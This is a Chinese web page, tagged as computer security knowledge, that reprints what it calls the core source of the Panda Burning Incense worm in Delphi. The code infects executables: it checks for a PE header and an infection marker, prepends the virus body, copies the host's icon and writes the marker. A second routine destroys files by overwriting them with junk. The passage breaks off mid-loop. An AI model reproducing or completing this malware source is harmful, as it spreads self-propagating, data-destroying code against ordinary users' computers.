概要:hdrstream, srcstream: tfilestream;icostream, dststream: tmemorystream;iid: longint;aicon: ticon;infected, ispe: boolean;i: integer;buf: array[0..1] of char;begintry //出错则文件正在被使用,退出if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染 exit;infected := false;ispe := false;srcstream := tfilestream.create(filename, fmopenread);try for i := 0 to $108 do //检查pe文件头 begin srcstream.seek(i, sofrombeginning); srcstream.read(buf, 2); if (buf[0] =
熊猫烧香核心代码,标签:电脑安全知识,个人电脑安全,http://www.laixuea.comhdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//头文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream, 0, dststream, 0, iconoffset);
//写入目前程序的主图标
copystream(icostream, 22, dststream, iconoffset, iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//写入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//写入已感染的标记
dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替换宿主文件
dststream.free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0); //去掉只读属性
filehandle := fileopen(filename, fmopenwrite); //打开文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //写入垃圾码的随机次数
if max < 5 then
max := 5;
mass := size div max; //每个间隔块的大小
len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
Tag:电脑安全,电脑安全知识,个人电脑安全,电脑学习 - 电脑安全